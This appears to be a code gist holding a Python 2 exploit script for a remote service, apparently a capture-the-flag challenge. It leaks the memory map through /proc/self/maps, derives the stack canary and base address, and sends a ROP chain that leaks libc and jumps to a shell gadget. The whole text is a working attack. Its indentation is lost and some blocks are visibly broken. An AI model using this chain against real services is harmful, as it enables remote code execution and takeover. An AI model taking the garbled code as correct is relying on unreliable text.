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Created May 14, 2018 01:09
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import socket, struct, os, binascii, base64
import telnetlib
from pow import *
def readline(sc, show = True):
res = ""
while len(res) == 0 or res[-1] != "\n":
data = sc.recv(1)
if len(data) == 0:
print repr(res)
raise Exception("Server disconnected")
res += data
if show:
print repr(res[:-1])
return res[:-1]
def read_until(sc, s):
res = ""
while not res.endswith(s):
data = sc.recv(1)
if len(data) == 0:
print repr(res)
raise Exception("Server disconnected")
res += data
return res[:-(len(s))]
def read_all(sc, n):
data = ""
while len(data) < n:
block = sc.recv(n - len(data))
if len(block) == 0:
print repr(data)
raise Exception("Server disconnected")
data += block
return data
def I(n):
return struct.pack("<I", n)
def Q(n):
return struct.pack("<Q", n)
# sc = socket.create_connection(("", 12345))
sc = socket.create_connection(("", 31337))
chall = readline(sc).split(": ")[1]
n = int(readline(sc).split(": ")[1])
res = solve_pow(chall, n)
print res
sc.send(str(res) + "\n")
sc.send("HEAD /proc/self/maps\n")
canary = 0
for i in xrange(3 + 7):
line = readline(sc)
if "r-xp" in line:
res = int(line.split("-")[0], 16) >> 12
if "ld" in line:
canary |= res << 36
canary |= res << 8
elfbase = res << 12
print hex(canary)
pop_rdi = elfbase + 0x10b3
pop_rsi_r15 = elfbase + 0x10b1
plt_puts = elfbase + 0x9e0
plt_read = elfbase + 0xa60
got_puts = elfbase + 0x202020
puts_offset = 0x6f690
shell_offset = 0x4526a
rop = "XXXXXXXX" * 11 + Q(canary) + "XXXXXXXX" + Q(pop_rdi) + Q(got_puts) + Q(plt_puts) + Q(pop_rdi) + Q(0) + Q(pop_rsi_r15) + Q(got_puts) + Q(0) + Q(plt_read) + Q(plt_puts) + "ZZZZZZZZ"
print len(rop)
if "\n" in rop:
sc.send(rop + "\n")
res = readline(sc)
libcaddr = struct.unpack("<Q", res.ljust(8, "\x00"))[0] - puts_offset
print hex(libcaddr)
sc.send(Q(libcaddr + shell_offset))
t = telnetlib.Telnet()
t.sock = sc
while True:
data = sc.recv(16384)
if len(data) == 0:
for line in data.split("\n"):
print repr(line)
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